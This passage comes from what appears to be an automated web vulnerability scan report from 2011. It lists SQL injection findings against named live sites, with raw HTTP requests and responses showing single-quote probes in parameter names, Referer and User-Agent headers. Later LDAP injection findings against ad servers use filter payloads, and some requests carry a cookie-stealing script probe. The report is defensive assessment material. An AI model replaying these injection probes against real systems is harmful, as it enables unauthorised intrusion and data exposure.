The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /site-map?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /site-map?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.118. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.119. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.120. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services/subscribe-to-e-newsletter

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.121. http://www.spicefactory.org/parsley [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spicefactory.org
Path:   /parsley

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:15:50 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6866

script: <BR>
number of MySQL function calls: 3<BR>
SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243','h
...[SNIP]...
<BR>
MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0)' at line 1<BR>
...[SNIP]...

Request 2

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:22 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta content="Spicefactory offers open source software for bu
...[SNIP]...

1.122. http://www.spicefactory.org/parsley [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spicefactory.org
Path:   /parsley

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:15:49 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6831

script: <BR>
number of MySQL function calls: 3<BR>
SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243',''
...[SNIP]...
<BR>
MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'',0)' at line 1<BR>
...[SNIP]...

Request 2

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:15:49 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta content="Spicefactory offers open source software for bu
...[SNIP]...

2. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://a.tribalfusion.com/j.ad [size parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The size parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the size parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=*)(sn=*&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 377

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aomM7iT6np2s31XrFLTPip4P3aQAJE4WMo1t3LpdEw56nW5cjaTVrbWGMfPP3uWWvSTFf12UAuWaMnWTnbSTYFSGQZaRretPtYiVsjT2FunntqrYqqM2WvZdQGfZd4AnZbpWisVWY6Yrr81bbh1EEsPbJstK9OLi/http://www.creditfairy.org"><img src="http://cdn5.tribalfusion.com/media/1990056.gif" border=0 height=60 width=468 ><\/a><\/center>');

Request 2

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=*)!(sn=*&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=asn7TwxZduBwoApTorMUjYrtQJqXsQZaZb6fZbVxooyK1mQOFIJFMXPVMoxcmDomur8rVZdZdyuy0WcfT1gSx9ZaZcvbZbSMD8ZaDH4CZc0gemFHZa4ibQGZawTwQBjZaM05ZacZcPw9sA89iu4sOmJsj3AX3xNW7ogh9VBldCQSLiwHFZaa1ksHfZbnmc2QgtZbP36b3C0xQlrZalAF9IySBoJJbAXZaJrOiLFrV2h7GMSTtTpxUCb4kd1fwSusC7UkKvBAMrFymrEHddhZbdyMpWZdSK7bLZbIj74P9KSZcS5WSOgEW1h5bNpZdPjbwZcl4MFsxyCveZab9x3J77y7UcewXUsfYoJrZcllORGe4MZcgRYw5grLDHgl2g3uXZbr1piQSvtqlMY; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:02 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 389

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/apmM7ioTfIYrJdUdrPm6fInGnspdQH5EMi2Wir3A7ZcnrUKXVfTYVv40cvwpT7T5bvRWUZbEUPjTPTrYPcrtStZbr1dvrT6rM4GvUYrFIVmqm5AZb8Q67E2dQO0W3DnWau4PrS3sb7UsU7UVBgSmrvWdFcqhLZcyI/http://www.clintonbushhaitifund.org/"><img src="http://cdn5.tribalfusion.com/media/1990046.jpeg" border=0 height=60 width=468 ><\/a><\/center>');

2.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt [NSC_betivggmf-opef cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The NSC_betivggmf-opef cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the NSC_betivggmf-opef cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=*)(sn=*;

Response 1

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:17 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=e5eec554-859a-4200-be95-bc9bf84cd684; domain=.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:17 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150945525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2>
</body></html>

Request 2

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=*)!(sn=*;

Response 2

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:17 GMT
